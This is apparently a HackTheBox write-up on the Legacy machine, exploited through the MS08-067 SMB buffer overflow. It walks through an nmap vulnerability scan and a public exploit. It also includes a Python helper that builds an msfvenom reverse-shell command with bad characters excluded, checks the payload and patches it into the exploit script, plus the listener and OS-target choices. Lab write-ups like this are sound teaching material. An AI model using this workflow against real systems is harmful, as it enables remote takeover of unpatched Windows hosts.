Solving Legacy HackTheBox, MS08-067

MS08-067

MS08-067 is a stack-based buffer overflow in the Windows Server service (the path canonicalization routine in netapi32.dll), reachable over SMB without authentication, which allows remote code execution. Windows 2000, XP and Server 2003 systems were affected.

Recon

Start with a port scan of the box.

From this we learn that the system is running Windows XP with the hostname Legacy. Following our experience on the Blue box, let's run a vulnerability scan with NSE scripts.

NSE vulnerability scanning

The scan reports the host as vulnerable to both MS08-067 and MS17-010 (EternalBlue). One caveat: the smb-vuln-ms08-067 script is marked dangerous by nmap and can crash the Server service, so run it only when you can reset the target.

I will use MS08-067 to get access to the box. After a bit of searching I found this exploit from jivoi.

Exploit

I cloned the entire repo onto my system and started going through the code. The comments note that you must generate your own shellcode and paste it into the script before it will work.

Let’s create the shellcode then!

This means we generate a reverse-shell payload that connects back to our local address on port 53; since the target is 32-bit we set the architecture to x86, and we exclude the bad characters \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40 (null, newline, carriage return, backslash, underscore, slash, dot and @), which would corrupt the path string the exploit sends and break the overflow.

After replacing the placeholder shellcode in the script with the generated payload, the exploit is ready to run against the machine :)
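The shellcode generation and replacement steps above, as an added example that is not part of the original write-up or of jivoi's exploit. It builds the msfvenom command with the same architecture and bad-character list, parses the `-f python` output back into bytes, verifies that the encoder really removed every bad character, and splices the result over the script's placeholder. Two assumptions are labelled in the code: the payload name `windows/shell_reverse_tcp` (the write-up only says "reverse shell"), and that the exploit stores its payload as a `shellcode=( "..." "..." )` string block; adjust the regex if your copy differs. The msfvenom output and exploit source embedded below are constructed samples so the check runs offline.

```python
import re
import subprocess

# Bad characters the exploit's comments say must not appear in the payload.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"


def msfvenom_cmd(lhost, lport=53, payload="windows/shell_reverse_tcp"):
    """Command line for a 32-bit Windows reverse shell with the bad characters
    excluded. The payload name is an assumption; pick the one you want."""
    return [
        "msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
        "-a", "x86", "--platform", "windows",
        "-b", "".join(f"\\x{b:02x}" for b in BADCHARS),
        "-f", "python", "-v", "shellcode",
    ]


# One line of msfvenom's python format: shellcode += b"\x..\x.."
_LINE = re.compile(r'^\s*\w+\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$', re.M)


def parse_msfvenom_python(text):
    """Turn msfvenom '-f python' output back into raw bytes."""
    hexstr = "".join(m.group(1) for m in _LINE.finditer(text))
    return bytes.fromhex(hexstr.replace("\\x", ""))


def find_badchars(sc, bad=BADCHARS):
    """Return (offset, byte) for every bad character present; [] means clean."""
    return [(i, b) for i, b in enumerate(sc) if b in bad]


def to_python_literal(sc, width=16):
    """Render bytes as the shellcode=( "..." ) block the exploit script uses."""
    lines = ['"' + "".join(f"\\x{b:02x}" for b in sc[i:i + width]) + '"'
             for i in range(0, len(sc), width)]
    return "shellcode=(\n" + "\n".join(lines) + "\n)"


# Assumed layout of the placeholder block in the exploit script.
_BLOCK = re.compile(r'^shellcode\s*=\s*\((?:\s*"[^"\n]*"\s*)*\)', re.M)


def patch_exploit(source, sc):
    """Replace the placeholder shellcode block in the exploit source with sc."""
    new_block = to_python_literal(sc)
    # A callable replacement keeps re from interpreting the backslashes.
    patched, n = _BLOCK.subn(lambda _m: new_block, source, count=1)
    if n != 1:
        raise ValueError("could not find a single shellcode=( ... ) block")
    return patched


def generate_and_patch(lhost, exploit_path, lport=53):
    """Run msfvenom, refuse payloads that still contain bad characters,
    and rewrite the exploit script in place. Returns the payload length."""
    out = subprocess.run(msfvenom_cmd(lhost, lport), check=True,
                         capture_output=True, text=True).stdout
    sc = parse_msfvenom_python(out)
    bad = find_badchars(sc)
    if bad:
        raise RuntimeError(f"encoder left bad characters: {bad}")
    with open(exploit_path) as f:
        src = f.read()
    with open(exploit_path, "w") as f:
        f.write(patch_exploit(src, sc))
    return len(sc)


# Constructed sample of msfvenom output (not a real payload).
SAMPLE_MSFVENOM_OUTPUT = '''shellcode =  b""
shellcode += b"\\xba\\x11\\x22\\x33"
shellcode += b"\\x44\\x55"
'''

# Constructed stand-in for the exploit script's placeholder block.
SAMPLE_EXPLOIT_SOURCE = '''import sys
# placeholder from the exploit; replace with your own msfvenom output
shellcode=(
"\\x90\\x90\\x90\\x90"
"\\xcc\\xcc"
)
print(len(shellcode))
'''

if __name__ == "__main__":
    import sys
    print(generate_and_patch(sys.argv[1], sys.argv[2]))
```

Usage: `python3 patch_ms08067.py <your-tun0-ip> ms08-067.py` regenerates the payload and rewrites the script; if the bad-character check fails, msfvenom picked an encoder that could not avoid one of the listed bytes, and you should rerun with a different `-e` encoder rather than fire the exploit.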

Setting up a listener on port 53 (it must match the LPORT baked into the shellcode).

Running the exploit

Here I pass the target IP, port and OS version as arguments.

Choosing the right OS version matters because the return address the exploit uses differs for each version and service pack; a wrong choice gives no shell and may crash the Server service. I chose the Universal option first but didn't get a shell, then switched to XP SP3 English, which worked.

Got the shell!!!

If you get connection errors, check out this forum thread, it helped me out!

Flags

Browsing to the Documents and Settings directory I found the john and Administrator profiles, which hold the user and root flags respectively.

Boo Yeah! Solved Legacy :)


Grad Student. Member Bi0s.
